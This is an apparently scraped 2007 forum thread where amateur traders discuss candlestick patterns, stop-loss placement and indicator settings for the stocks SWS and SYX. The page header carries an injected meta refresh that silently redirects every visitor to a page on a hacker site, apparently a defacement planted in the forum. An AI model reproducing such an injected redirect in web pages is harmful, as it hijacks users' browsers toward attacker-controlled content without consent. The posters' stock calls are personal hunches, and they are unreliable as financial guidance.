Forum Index" /> <meta http-equiv="refresh" content="0;URL=http://www.turkhacks.com/dosya/heyk.html"> :: View topic - SWS
<meta http-equiv= Forum Index" vspace="1" />
Revolutionizing Investor Psychology

FAQFAQ   SearchSearch   MemberlistMemberlist   UsergroupsUsergroups   RegisterRegister 
 ProfileProfile   Log in to check your private messagesLog in to check your private messages   Log inLog in 

SWS

Post new topic   Reply to topic     Forum Index -> Stephen W. Bigalow's Candlestick Trading
View previous topic :: View next topic  
ninner

PostPosted: Sat Feb 10, 2007 4:07 pm    Post subject: SWS Reply with quote

any comments about the last 3 days for this stock...im confused...the STO are heading up however, the stock is showing some small red candles...where would u put the stop loss...middle of that big white candle....what do u think about the chart.

cheers
Harry

PostPosted: Sat Feb 10, 2007 8:56 pm    Post subject: Reply with quote

I wouldn't buy it right now but if I owned it I would keep it. I would say the odds are in your favor, maybe 7-8 out of 10 that it will go on up. A spike with over a million volume. Somebody knows something. or least they think they do. I would wait on it with a stop around 26. Of course this would depend on where I got in at. 28 stop at 28, 27 stop at 27, 26 stop at 26, ect. I would be willing to give up my profit for these kind of odds but not to take a loss. Very Happy
ninner

PostPosted: Sun Feb 11, 2007 1:56 am    Post subject: Reply with quote

thanks for the reply buddy, i appreciate it...yet im holding since like 22...so i think i will keep holding it...
russjackel

PostPosted: Sun Feb 11, 2007 9:43 pm    Post subject: Reply with quote

If you are in at 22 I would set a stop at 28 or a bit lower which would be the middle of the long white candle volume has dropped off to about a half mill and could come down to test ma. I would rather sell at a profit and then if it looks like a J hook forming get back in. You have a decent profit and always remember pigs get slaughtered. I feel it could go up but the chance of a decline is also very strong although I do not see it dropping to your 22 buy. I like to bank profits and not give them back to the market.
ninner

PostPosted: Mon Feb 12, 2007 2:25 am    Post subject: Reply with quote

u are very wise jackel...thanks for the advice i will look at its action tomorrow.....I think CWTR...just did a belthold pattern on fri..if it opens higher it may be worth a play.
Harry

PostPosted: Mon Feb 12, 2007 9:50 am    Post subject: Reply with quote

Everyone take this for what it is worth. I went back and reviewed all my trades from 06. Of course I had some winners and loosers. On 75% of my loosers or break even trades I was stopped out or got out at the wrong time. I picked a lot of winners that I made very little on or none at all. I know for sure that the correct placing of the stops and selling is the most important part of trading. No matter how good the stock is or how good the setup is you only make money when you get out. There is nothing that makes me any mader that to get stopped out and see the stock closing higher and goes up the next few days. With an IRA account the money doesn't settle for 3 days if you have just got in. That is a long time if the stock is running. I compare it to fishing. You have wasted your time and work if you get a big one on and don't land it. It is common knowledge where most of the stops are placed so it does not take a rocket scientist to run stock down thru its stops for whatever the reasons. They can't keep a good stock down so it goes right back up with you stopped out. This is the one area that I will work on the most. Very Happy
ninner

PostPosted: Mon Feb 12, 2007 5:01 pm    Post subject: Reply with quote

Harry, im in the same camp....personally i try not too use stops however, i do have a game plan on where i may want to consider selling. 3 years ago was my first year in the market and i sold a lot of stocks that went alot higher and i got out too soon..i vowed never to do that again and im also trying to improve that aspect ....im getting abit better...i guess buying at the right time really helps..like right now...i would not be buying too many stocks with the market moving down.

cheers
Harry

PostPosted: Tue Feb 13, 2007 5:24 pm    Post subject: Reply with quote

ninner, take a look at the chart for SYX. This is exactly what I was talking about. SYX has had a great run. It has went from 14.30 on the 20th of Dec. to 28.43 yesterday the 12th of Feb. It closed on 27.63 the 7th of
Feb. It had 2 days of not much going on and then on the morning of the 12th it went down to 25.25 before closing at 28.43. That is exactly 8.6% from the close on the 7th. I don't own any of it but I wonder where all the stops were positioned. I see this all the time. I wonder who did all the buying after the stops were taken out. Been there done that. Very Happy
ninner

PostPosted: Tue Feb 13, 2007 10:18 pm    Post subject: Reply with quote

so are u saying u think SYX is going higher...i think some big buying was done due to the volume and price movment...what do u make of all the small candles for SWS...3 tight closes in a row now??? maybe another move up??
Harry

PostPosted: Tue Feb 13, 2007 10:55 pm    Post subject: Reply with quote

This is a good one for us to watch and see if we can get a read when it runs out of steam. I think it is still headed up but it needs to be monitored every day. It will tell us when it is running out of steam most of the time. Very Happy
Harry

PostPosted: Wed Feb 14, 2007 4:28 pm    Post subject: Reply with quote

ninner, a day makes a big difference. It looks to me like SYX is about finished on this leg. Here is what I see. It gave back .30 in the last 15 minutes today. This not a good sign. It made a doji today which is indecision. All my indicators look like they are starting to roll over. If I owned any of it I would take half my position off the table in the morning on the open and put a hard stop at $26.98 on the other half. This is 4 out of the last 5 days it has been in the red. Not a good sign. I just wanted to share what I saw today. I'm wishing you the best whatever decision you make. Very Happy
ninner

PostPosted: Wed Feb 14, 2007 10:14 pm    Post subject: Reply with quote

thanks dude....i may do that... i wont put a stop on but i may just sell...what do u think of SWS...alot of indecision...i havent really seen a pattern like this before..where u get all these dojis after a big day.

cheers
ninner

PostPosted: Wed Feb 14, 2007 10:16 pm    Post subject: Reply with quote

btw what indicators are telling u that SYX is going to roll over..what do u use...i dont see it with the MACD, or the stochastics, or the rsi. but maybe im intrepreting them incorrectly.
Harry

PostPosted: Thu Feb 15, 2007 12:57 am    Post subject: Reply with quote

ninner, we will have to see what tomorrow brings. I have set my indicators by trial and error until I got what worked best for me on my charts by looking at the past history of a lot of charts. I have heard steve say something about everyone has to find what works best for them. Here are mine. Stochastic are 14 1 3 Macd is 12 26 9 CCI is 20. I still like the chart for SWS as of tonight. The doji's are getting smaller every day. We now have a 5 nr bar as of today. They have make a good flag and all the tails (I call them lizards) are on the top. Volume is decreasing and they have built a good base at $3.65. I see a real good possibility for a big move to the upside on this one. All this information and a dollar will buy you a cup of coffee in the morning. Here is hoping that tomorrow will be the best trading day ever for you. Very Happy
ninner

PostPosted: Thu Feb 15, 2007 3:11 pm    Post subject: Reply with quote

i think with SYX i will use the 10 day moving average as my stop....that seems to be support at the moment and the more times that holds...it may provide a better cushion. I may even do that with SWS...however the 10 day and 20 day are just seperating so it may be a safer bet its goin ghigher....

all the best in your trading today.
Post new topic   Reply to topic     Forum Index -> Stephen W. Bigalow's Candlestick Trading All times are GMT - 5 Hours
Page 1 of 1

Jump to: